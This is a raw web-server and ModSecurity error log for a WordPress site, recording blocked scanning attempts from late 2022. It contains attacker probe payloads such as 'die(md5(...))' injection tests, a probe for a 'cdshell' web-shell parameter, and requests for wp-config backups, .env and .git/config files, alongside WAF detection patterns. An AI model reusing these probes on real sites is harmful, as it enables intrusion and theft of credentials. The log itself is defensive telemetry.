140533200545536] [client 77.120.122.14:58168] [client 77.120.122.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:X-Dns-Prefetch-Control. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:X-Dns-Prefetch-Control: die(md5(76));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "Y4XKwEs7KQs6rSt8eloAmwAAAI8"] [Tue Nov 29 12:11:33.714910 2022] [autoindex:error] [pid 9673:tid 140533267687168] [client 43.130.90.93:39744] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2022/11/29 17:57:26 [error] 8992#8992: *507545 access forbidden by rule, client: 195.189.99.224, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Nov 29 20:32:40.645639 2022] [:error] [pid 9673:tid 140533400037120] [client 5.188.62.76:55614] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4ayuMkhlIWLR0-Etaps9QAAAMA"] [Wed Nov 30 03:22:33.239346 2022] [ssl:warn] [pid 27520:tid 139956936054656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 30 03:22:33.375126 2022] [ssl:warn] [pid 27521:tid 139956936054656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 30 03:22:33.910178 2022] [ssl:warn] [pid 27521:tid 139956936054656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 30 03:22:36.333650 2022] [ssl:warn] [pid 27521:tid 139956936054656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 30 03:22:38.660439 2022] [ssl:warn] [pid 27936:tid 139951992473472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 30 03:22:38.773625 2022] [ssl:warn] [pid 27937:tid 139951992473472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 30 14:15:19.504658 2022] [autoindex:error] [pid 28580:tid 139951677093632] [client 92.205.56.212:35372] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Nov 30 17:37:58.996194 2022] [:error] [pid 27959:tid 139951693879040] [client 5.188.62.21:43098] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4fbRnCxIKzi3_ort1xVggAAAIY"] [Wed Nov 30 18:44:02.321512 2022] [:error] [pid 27957:tid 139951551203072] [client 5.188.62.174:45698] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4fqwsGZrNWV7ghnzaLdIQAAABc"] [Wed Nov 30 19:16:34.298044 2022] [:error] [pid 28580:tid 139951609952000] [client 5.188.62.76:46640] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4fyYq_uOCNf4rdVVRJ_kgAAANA"] [Thu Dec 01 03:35:00.995134 2022] [ssl:warn] [pid 30782:tid 140660633458560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Dec 01 03:35:01.134436 2022] [ssl:warn] [pid 30783:tid 140660633458560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Dec 01 03:35:01.528552 2022] [ssl:warn] [pid 30783:tid 140660633458560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Dec 01 03:35:03.470108 2022] [ssl:warn] [pid 30783:tid 140660633458560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Dec 01 03:35:05.725881 2022] [ssl:warn] [pid 31232:tid 140049652295552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Dec 01 03:35:05.850950 2022] [ssl:warn] [pid 31233:tid 140049652295552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Dec 01 03:51:48.636010 2022] [:error] [pid 31252:tid 140049295312640] [client 5.188.62.174:35354] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4hrJJ5TnXl7ARyGBDUHgwAAAI0"] [Thu Dec 01 04:31:48.254002 2022] [:error] [pid 31555:tid 140049312098048] [client 5.188.62.76:37334] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4h0hMgNoAa36DEwY56hSgAAAMs"] [Thu Dec 01 06:34:30.056783 2022] [autoindex:error] [pid 31555:tid 140049454888704] [client 170.106.203.220:40220] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Dec 01 08:53:45.323871 2022] [autoindex:error] [pid 31252:tid 140049211385600] [client 170.106.203.73:43572] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Dec 01 09:59:44.525674 2022] [:error] [pid 31250:tid 140049354061568] [client 188.165.157.120:46398] PHP Fatal error: Class 'WP_REST_Controller' not found in /home/investig/public_html/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php on line 17 [Thu Dec 01 10:00:54.845947 2022] [:error] [pid 31555:tid 140049270134528] [client 5.188.62.140:46422] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4jBpsgNoAa36DEwY56legAAANA"] [Thu Dec 01 10:01:44.584661 2022] [:error] [pid 31555:tid 140049463281408] [client 188.165.157.120:46526] PHP Fatal error: Uncaught Error: Call to undefined function __() in /home/investig/public_html/wp-admin/user/menu.php:10 [Thu Dec 01 10:01:44.584735 2022] [:error] [pid 31555:tid 140049463281408] [client 188.165.157.120:46526] Stack trace: [Thu Dec 01 10:01:44.584761 2022] [:error] [pid 31555:tid 140049463281408] [client 188.165.157.120:46526] #0 {main} [Thu Dec 01 10:01:44.584822 2022] [:error] [pid 31555:tid 140049463281408] [client 188.165.157.120:46526] thrown in /home/investig/public_html/wp-admin/user/menu.php on line 10 [Thu Dec 01 10:05:30.486519 2022] [:error] [pid 31252:tid 140049261741824] [client 187.103.250.210:46670] PHP Fatal error: Class 'WP_REST_Controller' not found in /home/investig/public_html/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php on line 17 [Thu Dec 01 10:05:55.856326 2022] [:error] [pid 31252:tid 140049345668864] [client 187.103.250.210:46672] PHP Fatal error: Class 'WP_REST_Controller' not found in /home/investig/public_html/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php on line 17 [Thu Dec 01 10:07:51.317598 2022] [:error] [pid 31555:tid 140049337276160] [client 187.103.250.210:46764] PHP Fatal error: Class 'WP_Widget' not found in /home/investig/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17 [Thu Dec 01 10:24:56.960157 2022] [:error] [pid 31250:tid 140049345668864] [client 5.188.62.140:47806] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4jHSM1oqTGFb_X4NwZ3OgAAAAc"] [Thu Dec 01 10:28:21.775161 2022] [:error] [pid 31252:tid 140049295312640] [client 5.188.62.26:47926] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4jIFZ5TnXl7ARyGBDULcAAAAI0"] [Thu Dec 01 10:53:31.436356 2022] [:error] [pid 31555:tid 140049438103296] [client 5.188.62.26:48786] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4jN-8gNoAa36DEwY56maAAAAMQ"] [Thu Dec 01 11:41:56.009256 2022] [:error] [pid 31555:tid 140049278527232] [client 5.188.62.76:51870] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4jZVMgNoAa36DEwY56oVgAAAM8"] [Thu Dec 01 12:11:02.195343 2022] [:error] [pid 31252:tid 140049312098048] [client 5.188.62.21:58464] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4jgJp5TnXl7ARyGBDUQQgAAAIs"] [Thu Dec 01 13:14:28.106975 2022] [:error] [pid 31250:tid 140049303705344] [client 5.188.62.174:33838] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4jvBM1oqTGFb_X4NwZ5xQAAAAw"] [Thu Dec 01 14:16:03.081387 2022] [:error] [pid 31251:tid 140049295312640] [client 5.188.62.76:35688] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4j9c9hQLjPwQP_QD_QLRwAAAE0"] [Thu Dec 01 19:03:33.998210 2022] [ssl:warn] [pid 31233:tid 140049652295552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Dec 02 03:22:31.020359 2022] [ssl:warn] [pid 30524:tid 139843429767040] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Dec 02 03:22:31.201703 2022] [ssl:warn] [pid 30525:tid 139843429767040] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Dec 02 03:22:31.721483 2022] [ssl:warn] [pid 30525:tid 139843429767040] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Dec 02 03:22:33.699120 2022] [ssl:warn] [pid 30525:tid 139843429767040] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Dec 02 03:22:36.026840 2022] [ssl:warn] [pid 30945:tid 140190279567232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Dec 02 03:22:36.159126 2022] [ssl:warn] [pid 30946:tid 140190279567232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Dec 02 05:49:06.752376 2022] [:error] [pid 30973:tid 140189829601024] [client 5.188.62.21:34838] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y4nYIrp23WFnYdzg5rsy4gAAAJg"] [Fri Dec 02 10:24:47.355648 2022] [:error] [pid 31432:tid 140190098945792] [client 67.222.109.244:42928] [client 67.222.109.244] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:cdshell. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:cdshell: die(md5(4565462));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/versions.php"] [unique_id "Y4oYv1V2mbu8fThFm7Y5sgAAAMA"], referer: investigacionperu.com [Fri Dec 02 10:30:47.934687 2022] [:error] [pid 30972:tid 140189888349952] [client 3.236.147.46:48764] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php.ini"] [unique_id "Y4oaJxxKn0hGNRA-nxXUAwAAAFE"] [Fri Dec 02 10:31:24.889253 2022] [:error] [pid 30972:tid 140189888349952] [client 3.236.147.46:48880] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Y4oaTBxKn0hGNRA-nxXUEAAAAFE"] [Fri Dec 02 10:31:44.679473 2022] [:error] [pid 30972:tid 140189863171840] [client 3.236.147.46:48974] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "Y4oaYBxKn0hGNRA-nxXUGAAAAFQ"] [Fri Dec 02 10:31:44.690154 2022] [:error] [pid 30971:tid 140189913528064] [client 3.236.147.46:48976] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "Y4oaYLgyGd3csGTCfY-r4QAAAA4"] [Fri Dec 02 10:31:45.477730 2022] [:error] [pid 31432:tid 140189989062400] [client 3.236.147.46:48980] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.cfg"] [unique_id "Y4oaYVV2mbu8fThFm7Y9FwAAAMU"] [Fri Dec 02 10:31:45.488439 2022] [:error] [pid 31432:tid 140189871564544] [client 3.236.147.46:48982] [client 3.236.147.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ 